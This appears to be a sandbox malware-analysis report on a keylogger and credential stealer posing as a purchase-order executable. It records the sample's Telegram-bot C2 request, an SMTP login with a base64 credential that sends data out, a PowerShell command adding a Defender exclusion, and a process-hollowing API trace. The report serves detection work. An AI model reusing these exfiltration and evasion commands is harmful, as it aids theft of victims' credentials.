                                                            2024-10-01 05:21:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-01 05:21:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.949728149.154.167.2204437704C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-01 05:21:12 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-10-01 05:21:13 UTC344INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Oct 2024 05:21:13 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-10-01 05:21:13 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Oct 1, 2024 07:21:19.340508938 CEST58749731208.91.199.223192.168.2.9220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                            Oct 1, 2024 07:21:19.340838909 CEST49731587192.168.2.9208.91.199.223EHLO 813848
                                                            Oct 1, 2024 07:21:19.497006893 CEST58749731208.91.199.223192.168.2.9250-us2.outbound.mailhostbox.com
                                                            250-PIPELINING
                                                            250-SIZE 41648128
                                                            250-VRFY
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Oct 1, 2024 07:21:19.498248100 CEST49731587192.168.2.9208.91.199.223AUTH login bWFrd2FuZGFAaXRjLWliLm5ldA==
                                                            Oct 1, 2024 07:21:19.657032013 CEST58749731208.91.199.223192.168.2.9334 UGFzc3dvcmQ6
                                                            Oct 1, 2024 07:21:19.818244934 CEST58749731208.91.199.223192.168.2.9235 2.7.0 Authentication successful
                                                            Oct 1, 2024 07:21:19.818667889 CEST49731587192.168.2.9208.91.199.223MAIL FROM:<makwanda@itc-ib.net>
                                                            Oct 1, 2024 07:21:19.975565910 CEST58749731208.91.199.223192.168.2.9250 2.1.0 Ok
                                                            Oct 1, 2024 07:21:19.975828886 CEST49731587192.168.2.9208.91.199.223RCPT TO:<nsorenseng@gmail.com>
                                                            Oct 1, 2024 07:21:20.155404091 CEST58749731208.91.199.223192.168.2.9250 2.1.5 Ok
                                                            Oct 1, 2024 07:21:20.155590057 CEST49731587192.168.2.9208.91.199.223DATA
                                                            Oct 1, 2024 07:21:20.314780951 CEST58749731208.91.199.223192.168.2.9354 End data with <CR><LF>.<CR><LF>
                                                            Oct 1, 2024 07:21:20.315638065 CEST49731587192.168.2.9208.91.199.223.
                                                            Oct 1, 2024 07:21:20.704895020 CEST58749731208.91.199.223192.168.2.9250 2.0.0 Ok: queued as 1446D500A49
                                                            Oct 1, 2024 07:22:58.708041906 CEST49731587192.168.2.9208.91.199.223QUIT
                                                            Oct 1, 2024 07:22:58.975488901 CEST58749731208.91.199.223192.168.2.9221 2.0.0 Bye

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:01:20:56
                                                            Start date:01/10/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                                                            Imagebase:0x130000
                                                            File size:763'392 bytes
                                                            MD5 hash:89B1330440F5E3CC7FDF662981760845
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:01:20:57
                                                            Start date:01/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                                                            Imagebase:0x630000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:01:20:57
                                                            Start date:01/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff70f010000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:01:20:57
                                                            Start date:01/10/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                                                            Imagebase:0x440000
                                                            File size:763'392 bytes
                                                            MD5 hash:89B1330440F5E3CC7FDF662981760845
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:01:20:57
                                                            Start date:01/10/2024
                                                            Path:C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                                                            Imagebase:0x660000
                                                            File size:763'392 bytes
                                                            MD5 hash:89B1330440F5E3CC7FDF662981760845
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:167
                                                              Total number of Limit Nodes:8
                                                              execution_graph 20972 b84668 20973 b8467a 20972->20973 20974 b84686 20973->20974 20976 b84778 20973->20976 20977 b8479d 20976->20977 20981 b84888 20977->20981 20985 b84879 20977->20985 20982 b848af 20981->20982 20983 b8498c 20982->20983 20989 b844c4 20982->20989 20986 b848af 20985->20986 20987 b8498c 20986->20987 20988 b844c4 CreateActCtxA 20986->20988 20988->20987 20990 b85918 CreateActCtxA 20989->20990 20992 b859db 20990->20992 20781 66d4e8e 20785 66d6138 20781->20785 20790 66d6148 20781->20790 20782 66d4eb3 20786 66d6148 20785->20786 20795 66d61ee 20786->20795 20810 66d6178 20786->20810 20787 66d616f 20787->20782 20791 66d615d 20790->20791 20793 66d61ee 12 API calls 20791->20793 20794 66d6178 12 API calls 20791->20794 20792 66d616f 20792->20782 20793->20792 20794->20792 20796 66d617c 20795->20796 20797 66d61f1 20795->20797 20798 66d61aa 20796->20798 20824 66d6c29 20796->20824 20829 66d68ce 20796->20829 20835 66d6ad1 20796->20835 20840 66d66f1 20796->20840 20845 66d6a97 20796->20845 20852 66d68b8 20796->20852 20857 66d685f 20796->20857 20861 66d695c 20796->20861 20866 66d65c3 20796->20866 20870 66d672a 20796->20870 20874 66d69cb 20796->20874 20797->20787 20798->20787 20811 66d617c 20810->20811 20812 66d61aa 20811->20812 20813 66d68ce 2 API calls 20811->20813 20814 66d6c29 2 API calls 20811->20814 20815 66d69cb 2 API calls 20811->20815 20816 66d672a 2 API calls 20811->20816 20817 66d65c3 2 API calls 20811->20817 20818 66d695c 2 API calls 20811->20818 20819 66d685f 2 API calls 20811->20819 20820 66d68b8 2 API calls 20811->20820 20821 66d6a97 4 API calls 20811->20821 20822 66d66f1 2 API calls 20811->20822 20823 66d6ad1 2 API calls 20811->20823 20812->20787 20813->20812 20814->20812 20815->20812 20816->20812 20817->20812 20818->20812 20819->20812 20820->20812 20821->20812 20822->20812 20823->20812 20825 66d66f0 20824->20825 20878 66d40da 20825->20878 20883 66d40e0 20825->20883 20826 66d6fbc 20830 66d6f39 20829->20830 20831 66d6629 20829->20831 20887 66d4758 20830->20887 20891 66d4760 20830->20891 20831->20798 20832 66d6f71 20836 66d6f50 20835->20836 20838 66d4758 WriteProcessMemory 20836->20838 20839 66d4760 WriteProcessMemory 20836->20839 20837 66d6f71 20838->20837 20839->20837 20841 66d670b 20840->20841 20843 66d40da ResumeThread 20841->20843 20844 66d40e0 ResumeThread 20841->20844 20842 66d6fbc 20843->20842 20844->20842 20895 66d418a 20845->20895 20899 66d4190 20845->20899 20846 66d6ab1 20850 66d40da ResumeThread 20846->20850 20851 66d40e0 ResumeThread 20846->20851 20847 66d6fbc 20850->20847 20851->20847 20853 66d6c6e 20852->20853 20855 66d4758 WriteProcessMemory 20853->20855 20856 66d4760 WriteProcessMemory 20853->20856 20854 66d6dba 20855->20854 20856->20854 20859 66d4758 WriteProcessMemory 20857->20859 20860 66d4760 WriteProcessMemory 20857->20860 20858 66d688d 20858->20798 20859->20858 20860->20858 20862 66d6bcd 20861->20862 20903 66d7298 20862->20903 20908 66d728a 20862->20908 20863 66d6be9 20863->20798 20921 66d49dc 20866->20921 20925 66d49e8 20866->20925 20929 66d4848 20870->20929 20933 66d4850 20870->20933 20871 66d674c 20937 66d7240 20874->20937 20942 66d7250 20874->20942 20875 66d69e3 20879 66d40de ResumeThread 20878->20879 20880 66d4082 20878->20880 20882 66d4151 20879->20882 20880->20826 20882->20826 20884 66d4120 ResumeThread 20883->20884 20886 66d4151 20884->20886 20886->20826 20888 66d4760 WriteProcessMemory 20887->20888 20890 66d47ff 20888->20890 20890->20832 20892 66d47a8 WriteProcessMemory 20891->20892 20894 66d47ff 20892->20894 20894->20832 20896 66d41d5 Wow64SetThreadContext 20895->20896 20898 66d421d 20896->20898 20898->20846 20900 66d41d5 Wow64SetThreadContext 20899->20900 20902 66d421d 20900->20902 20902->20846 20904 66d72ad 20903->20904 20913 66d4698 20904->20913 20917 66d46a0 20904->20917 20905 66d72cc 20905->20863 20909 66d72ad 20908->20909 20911 66d4698 VirtualAllocEx 20909->20911 20912 66d46a0 VirtualAllocEx 20909->20912 20910 66d72cc 20910->20863 20911->20910 20912->20910 20914 66d46e0 VirtualAllocEx 20913->20914 20916 66d471d 20914->20916 20916->20905 20918 66d46e0 VirtualAllocEx 20917->20918 20920 66d471d 20918->20920 20920->20905 20922 66d49e8 CreateProcessA 20921->20922 20924 66d4c33 20922->20924 20926 66d4a71 CreateProcessA 20925->20926 20928 66d4c33 20926->20928 20930 66d489b ReadProcessMemory 20929->20930 20932 66d48df 20930->20932 20932->20871 20934 66d489b ReadProcessMemory 20933->20934 20936 66d48df 20934->20936 20936->20871 20938 66d7265 20937->20938 20940 66d418a Wow64SetThreadContext 20938->20940 20941 66d4190 Wow64SetThreadContext 20938->20941 20939 66d727b 20939->20875 20940->20939 20941->20939 20943 66d7265 20942->20943 20945 66d418a Wow64SetThreadContext 20943->20945 20946 66d4190 Wow64SetThreadContext 20943->20946 20944 66d727b 20944->20875 20945->20944 20946->20944 20947 66d7528 20948 66d76e8 20947->20948 20949 66d754e 20947->20949 20951 66d770e 20949->20951 20952 66d77c5 20949->20952 20954 66d77d9 PostMessageW 20952->20954 20955 66d7814 20954->20955 20956 b8acb0 20960 b8ada8 20956->20960 20965 b8ad97 20956->20965 20957 b8acbf 20961 b8addc 20960->20961 20962 b8adb9 20960->20962 20961->20957 20962->20961 20963 b8afe0 GetModuleHandleW 20962->20963 20964 b8b00d 20963->20964 20964->20957 20966 b8addc 20965->20966 20967 b8adb9 20965->20967 20966->20957 20967->20966 20968 b8afe0 GetModuleHandleW 20967->20968 20969 b8b00d 20968->20969 20969->20957 20970 b8d690 DuplicateHandle 20971 b8d726 20970->20971 20993 b8d040 20994 b8d086 GetCurrentProcess 20993->20994 20996 b8d0d8 GetCurrentThread 20994->20996 20997 b8d0d1 20994->20997 20998 b8d10e 20996->20998 20999 b8d115 GetCurrentProcess 20996->20999 20997->20996 20998->20999 21002 b8d14b 20999->21002 21000 b8d173 GetCurrentThreadId 21001 b8d1a4 21000->21001 21002->21000

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00B8D0BE
                                                              • GetCurrentThread.KERNEL32 ref: 00B8D0FB
                                                              • GetCurrentProcess.KERNEL32 ref: 00B8D138
                                                              • GetCurrentThreadId.KERNEL32 ref: 00B8D191
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 18d9e063f80d7982c1196076a71916af5343e25a60ba925a4e1cc5665f06cacc
                                                              • Instruction ID: de2a5ee0bcdccfdd0301b60f4da4c2956032ed64dbd37f3e4ddd807252045792
                                                              • Opcode Fuzzy Hash: 18d9e063f80d7982c1196076a71916af5343e25a60ba925a4e1cc5665f06cacc
                                                              • Instruction Fuzzy Hash: 665198B09003498FDB15DFA9D548BEEBBF1EF88300F24849AD009A73A1C774A945CF61

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00B8D0BE
                                                              • GetCurrentThread.KERNEL32 ref: 00B8D0FB
                                                              • GetCurrentProcess.KERNEL32 ref: 00B8D138
                                                              • GetCurrentThreadId.KERNEL32 ref: 00B8D191
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 881438ffb3529141f5916362da59ba9b29aaf51fab19dcb9c8102b7cd740f672
                                                              • Instruction ID: 8544702710443af408635eebab45721351423b66d9dbf57b3f7f6596866360b1
                                                              • Opcode Fuzzy Hash: 881438ffb3529141f5916362da59ba9b29aaf51fab19dcb9c8102b7cd740f672
                                                              • Instruction Fuzzy Hash: 715168B09007498FDB15DFAAD548BDEBBF1EF48314F20849AE409A73A0D774A944CF65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 44 66d49dc-66d4a7d 47 66d4a7f-66d4a89 44->47 48 66d4ab6-66d4ad6 44->48 47->48 49 66d4a8b-66d4a8d 47->49 53 66d4b0f-66d4b3e 48->53 54 66d4ad8-66d4ae2 48->54 51 66d4a8f-66d4a99 49->51 52 66d4ab0-66d4ab3 49->52 55 66d4a9d-66d4aac 51->55 56 66d4a9b 51->56 52->48 64 66d4b77-66d4c31 CreateProcessA 53->64 65 66d4b40-66d4b4a 53->65 54->53 57 66d4ae4-66d4ae6 54->57 55->55 58 66d4aae 55->58 56->55 59 66d4b09-66d4b0c 57->59 60 66d4ae8-66d4af2 57->60 58->52 59->53 62 66d4af4 60->62 63 66d4af6-66d4b05 60->63 62->63 63->63 66 66d4b07 63->66 76 66d4c3a-66d4cc0 64->76 77 66d4c33-66d4c39 64->77 65->64 67 66d4b4c-66d4b4e 65->67 66->59 69 66d4b71-66d4b74 67->69 70 66d4b50-66d4b5a 67->70 69->64 71 66d4b5c 70->71 72 66d4b5e-66d4b6d 70->72 71->72 72->72 73 66d4b6f 72->73 73->69 87 66d4cd0-66d4cd4 76->87 88 66d4cc2-66d4cc6 76->88 77->76 90 66d4ce4-66d4ce8 87->90 91 66d4cd6-66d4cda 87->91 88->87 89 66d4cc8 88->89 89->87 93 66d4cf8-66d4cfc 90->93 94 66d4cea-66d4cee 90->94 91->90 92 66d4cdc 91->92 92->90 96 66d4d0e-66d4d15 93->96 97 66d4cfe-66d4d04 93->97 94->93 95 66d4cf0 94->95 95->93 98 66d4d2c 96->98 99 66d4d17-66d4d26 96->99 97->96 101 66d4d2d 98->101 99->98 101->101
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D4C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 2310830748273c2677782d62e57c9c628a1b67d9388958591264799223bdfe18
                                                              • Instruction ID: 999947dbb30b3a5971bec2ffa9f8ebb4df5403a8bcfa370d4d94acb237f9d460
                                                              • Opcode Fuzzy Hash: 2310830748273c2677782d62e57c9c628a1b67d9388958591264799223bdfe18
                                                              • Instruction Fuzzy Hash: 11A14771D003199FEB60DF68C841BEEBBF2AF48314F1485A9E849A7280DB759985CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 102 66d49e8-66d4a7d 104 66d4a7f-66d4a89 102->104 105 66d4ab6-66d4ad6 102->105 104->105 106 66d4a8b-66d4a8d 104->106 110 66d4b0f-66d4b3e 105->110 111 66d4ad8-66d4ae2 105->111 108 66d4a8f-66d4a99 106->108 109 66d4ab0-66d4ab3 106->109 112 66d4a9d-66d4aac 108->112 113 66d4a9b 108->113 109->105 121 66d4b77-66d4c31 CreateProcessA 110->121 122 66d4b40-66d4b4a 110->122 111->110 114 66d4ae4-66d4ae6 111->114 112->112 115 66d4aae 112->115 113->112 116 66d4b09-66d4b0c 114->116 117 66d4ae8-66d4af2 114->117 115->109 116->110 119 66d4af4 117->119 120 66d4af6-66d4b05 117->120 119->120 120->120 123 66d4b07 120->123 133 66d4c3a-66d4cc0 121->133 134 66d4c33-66d4c39 121->134 122->121 124 66d4b4c-66d4b4e 122->124 123->116 126 66d4b71-66d4b74 124->126 127 66d4b50-66d4b5a 124->127 126->121 128 66d4b5c 127->128 129 66d4b5e-66d4b6d 127->129 128->129 129->129 130 66d4b6f 129->130 130->126 144 66d4cd0-66d4cd4 133->144 145 66d4cc2-66d4cc6 133->145 134->133 147 66d4ce4-66d4ce8 144->147 148 66d4cd6-66d4cda 144->148 145->144 146 66d4cc8 145->146 146->144 150 66d4cf8-66d4cfc 147->150 151 66d4cea-66d4cee 147->151 148->147 149 66d4cdc 148->149 149->147 153 66d4d0e-66d4d15 150->153 154 66d4cfe-66d4d04 150->154 151->150 152 66d4cf0 151->152 152->150 155 66d4d2c 153->155 156 66d4d17-66d4d26 153->156 154->153 158 66d4d2d 155->158 156->155 158->158
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 066D4C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1354844449.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_66d0000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: eff2fb97cead9c9d7dc2d4f3b2d8be7210b141933cfd76486ac887a1f3cbdd34
                                                              • Instruction ID: 79bc5419e29473ef981de32857140beb35d6d9876fe957fef3b0529baa8c5e92
                                                              • Opcode Fuzzy Hash: eff2fb97cead9c9d7dc2d4f3b2d8be7210b141933cfd76486ac887a1f3cbdd34
                                                              • Instruction Fuzzy Hash: 54913771D007198FEB60DF69C8417EEBBF2FB48314F1485AAE809A7280DB759985CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 159 b8ada8-b8adb7 160 b8adb9-b8adc6 call b8a0cc 159->160 161 b8ade3-b8ade7 159->161 167 b8adc8 160->167 168 b8addc 160->168 163 b8ade9-b8adf3 161->163 164 b8adfb-b8ae3c 161->164 163->164 170 b8ae49-b8ae57 164->170 171 b8ae3e-b8ae46 164->171 214 b8adce call b8b040 167->214 215 b8adce call b8b031 167->215 168->161 172 b8ae59-b8ae5e 170->172 173 b8ae7b-b8ae7d 170->173 171->170 175 b8ae69 172->175 176 b8ae60-b8ae67 call b8a0d8 172->176 178 b8ae80-b8ae87 173->178 174 b8add4-b8add6 174->168 177 b8af18-b8afd8 174->177 180 b8ae6b-b8ae79 175->180 176->180 209 b8afda-b8afdd 177->209 210 b8afe0-b8b00b GetModuleHandleW 177->210 181 b8ae89-b8ae91 178->181 182 b8ae94-b8ae9b 178->182 180->178 181->182 185 b8aea8-b8aeaa call b8a0e8 182->185 186 b8ae9d-b8aea5 182->186 188 b8aeaf-b8aeb1 185->188 186->185 190 b8aebe-b8aec3 188->190 191 b8aeb3-b8aebb 188->191 192 b8aee1-b8aeee 190->192 193 b8aec5-b8aecc 190->193 191->190 200 b8aef0-b8af0e 192->200 201 b8af11-b8af17 192->201 193->192 195 b8aece-b8aede call b8a0f8 call b8a108 193->195 195->192 200->201 209->210 211 b8b00d-b8b013 210->211 212 b8b014-b8b028 210->212 211->212 214->174 215->174
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00B8AFFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: e1a6f03937f40e374d1b55f10771a055d48b4f6a3f8c5cf8e21bbd2386c875d0
                                                              • Instruction ID: 66994abe00b8a1ff75c95e8682da78799caa7e3bf1133e5af1a76763af15fc10
                                                              • Opcode Fuzzy Hash: e1a6f03937f40e374d1b55f10771a055d48b4f6a3f8c5cf8e21bbd2386c875d0
                                                              • Instruction Fuzzy Hash: 5D814870A00B058FE724EF29D45579ABBF1FF88304F10896EE44AD7A60D775E849CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 216 b8590c-b859d9 CreateActCtxA 218 b859db-b859e1 216->218 219 b859e2-b85a3c 216->219 218->219 226 b85a4b-b85a4f 219->226 227 b85a3e-b85a41 219->227 228 b85a60 226->228 229 b85a51-b85a5d 226->229 227->226 231 b85a61 228->231 229->228 231->231
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00B859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 7910a07fd64943e9a0dbe586c5cfbd323a420b93230ceca607f6bb0ffadd8b0b
                                                              • Instruction ID: bab387dcfd539cedc1a3db0f73ad13a967d962a900d611889aa5a2d1ac37d48e
                                                              • Opcode Fuzzy Hash: 7910a07fd64943e9a0dbe586c5cfbd323a420b93230ceca607f6bb0ffadd8b0b
                                                              • Instruction Fuzzy Hash: A041C170C00719CBEB25DFA9C884BDEBBF5BF49704F20816AD409AB261DB756946CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 232 b844c4-b859d9 CreateActCtxA 235 b859db-b859e1 232->235 236 b859e2-b85a3c 232->236 235->236 243 b85a4b-b85a4f 236->243 244 b85a3e-b85a41 236->244 245 b85a60 243->245 246 b85a51-b85a5d 243->246 244->243 248 b85a61 245->248 246->245 248->248
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00B859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1349852018.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b80000_Purchase Order 007823-PO# 005307.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 473c14e56be6175dcb112f40bd96700ce4205f24d22bdcc414619c51d2371d08
                                                              • Instruction ID: fbc32bbf4154d7708ab42a0275afbee88e032a92415b758ff1ec349f58dbefc1
                                                              • Opcode Fuzzy Hash: 473c14e56be6175dcb112f40bd96700ce4205f24d22bdcc414619c51d2371d08
                                                              • Instruction Fuzzy Hash: 6F41CF70C0071DCBEB24DFA9C8847DEBBF5AF49704F20816AD409AB261DB756945CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
